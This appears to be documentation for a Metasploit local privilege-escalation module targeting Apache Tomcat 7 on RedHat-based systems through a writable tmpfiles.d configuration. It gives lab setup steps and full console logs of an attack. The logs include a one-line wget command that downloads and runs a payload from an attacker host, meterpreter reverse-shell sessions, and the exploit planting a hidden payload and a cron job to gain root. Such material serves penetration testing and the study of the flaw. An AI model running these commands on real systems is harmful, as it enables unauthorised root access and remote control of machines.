## Vulnerable Application

This module exploits a vulnerability in RedHat based systems where
improper file permissions are applied to `/usr/lib/tmpfiles.d/tomcat.conf`
for Apache Tomcat versions before 7.0.54-8.  This may also work against

The configuration files in `tmpfiles.d` are used by `systemd-tmpfiles` to manage
temporary files including their creation.

With this weak permission, we're able to inject commands into `systemd-tmpfiles`
service to write a cron job to execute our payload.

`systemd-tmpfiles` is executed by default on boot on RedHat-based systems
through `systemd-tmpfiles-setup.service`. Depending on the system in use,
the execution of `systemd-tmpfiles` could also be triggered by other
services, cronjobs, startup scripts etc.

This module was tested against Tomcat 7.0.54-3 on Fedora 21.

### Install

This will install Tomcat 7 (7.0.54-3) on Fedora 21.

We also change the `tomcat` user's shell to `/bin/bash` to make setting up the priv-esc
easier.

```
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-7.0.54-3.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-lib-7.0.54-3.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-collections-3.2.1-20.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-daemon-1.0.15-8.fc21.x86_64.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-dbcp-1.4-16.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-logging-1.1.3-14.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-pool-1.6-9.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-el-2.2-api-7.0.54-3.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-jsp-2.2-api-7.0.54-3.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-servlet-3.0-api-7.0.54-3.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/e/ecj-4.4.0-1.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/g/geronimo-jta-1.1.1-17.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/g/geronimo-jms-1.1.1-19.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/l/log4j12-1.2.17-7.fc21.noarch.rpm
wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/j/javamail-1.5.1-3.fc21.noarch.rpm
rpm -i *.rpm
sudo sed -i 's|/bin/nologin|/bin/bash|g' /etc/passwd
```

You can now `su tomcat` and get your starter shell.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Get an initial shell as the `tomcat` user
4. Do: `use exploit/linux/local/tomcat_rhel_based_temp_priv_esc`
5. Do: `set session #`
6. Do: `run`
7. You should get a root shell.

## Options

### WritableDir

A directory where we can write and execute files. Defaults to `/tmp`.

## Scenarios

### Tomcat 7 (7.0.54-3) on Fedora 21

Initial shell

```
msf > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(multi/script/web_delivery) > set target 7
target => 7
msf exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/script/web_delivery) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/fGd5wnh85
[*] Server started.
[*] Run the following command on the target machine:
wget -qO TbT9zhqH --no-check-certificate http://1.1.1.1:8080/fGd5wnh85; chmod +x TbT9zhqH; ./TbT9zhqH& disown

msf exploit(multi/script/web_delivery) > 
[*] 2.2.2.2      web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045348 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41270) at 2023-01-19 15:22:23 -0500

msf exploit(multi/script/web_delivery) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: tomcat
meterpreter > sysinfo
Computer     : localhost.domain
OS           : Fedora 21 (Linux 3.17.4-301.fc21.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
```

Priv Esc

```
msf exploit(multi/script/web_delivery) > use exploit/linux/local/tomcat_rhel_based_temp_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set session 1
session => 1
msf exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable app version detected: 7.0.54.pre.3
[*] Creating backup of /usr/lib/tmpfiles.d/tomcat.conf
[+] Original /usr/lib/tmpfiles.d/tomcat.conf backed up to /root/.msf4/loot/20230119152336_default_2.2.2.2_usrlibtmpfile_530018.txt
[*] Uploading Payload to /tmp/.4ptbf6f4fW
[*] Writing '/tmp/.4ptbf6f4fW' (1068640 bytes) ...
[*] Writing permission elevation into /usr/lib/tmpfiles.d/tomcat.conf
[*] Creating cron job in /etc/cron.d/grPwZ
[+] Waiting 1800 seconds on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)
[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] Sleeping for 8 seconds before attempting again
[-] /etc/cron.d/grPwZ not found, checking in 10 seconds
[*] Waiting on cron to kick the payload (~1 minute)
[+] Deleted /tmp/.4ptbf6f4fW
[+] Deleted /etc/cron.d/grPwZ
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:41271) at 2023-01-19 15:24:24 -0500

meterpreter > getuid
Server username: root
```
